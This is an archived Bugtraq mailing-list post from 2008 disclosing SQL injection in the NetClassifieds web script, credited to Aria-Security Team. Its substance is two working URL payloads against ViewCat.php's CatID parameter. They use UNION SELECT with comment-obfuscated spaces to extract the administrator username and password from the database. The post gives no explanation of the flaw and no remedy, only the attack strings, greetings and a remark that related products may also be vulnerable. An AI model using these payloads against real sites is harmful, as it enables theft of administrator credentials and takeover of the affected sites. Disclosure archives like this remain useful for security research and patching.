[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NetClassifieds Sql Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NetClassifieds Sql Injection
From: noreply@xxxxxxxxxxxxxxxxx
Date: 23 Apr 2008 01:12:26 -0000

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
Greetz: Aura, imm02tal, Null, Kinglet, Mormoroth
http://www.scriptdevelopers.net/ (tested on NetClassifieds)
Original Post @ http://forum.aria-security.com/showthread.php?p=107#

ViewCat.php?CatID=-1/**/union/**/select/**/1,username,3/**/from/**/administrators/*
ViewCat.php?CatID=-1/**/union/**/select/**/1,2,user_passowrd/**/from/**/administrators/*


Note: other NetClassfields Product maybe vulnerable with the same vuln. 

Regards, 
The-0utl4w

Prev by Date: LayerOne 2008 - Final Pre-Con Update
Next by Date: Zune software - arbitrary file overwrite
Previous by thread: LayerOne 2008 - Final Pre-Con Update
Next by thread: Re: NetClassifieds Sql Injection
Index(es):
- Date
- Thread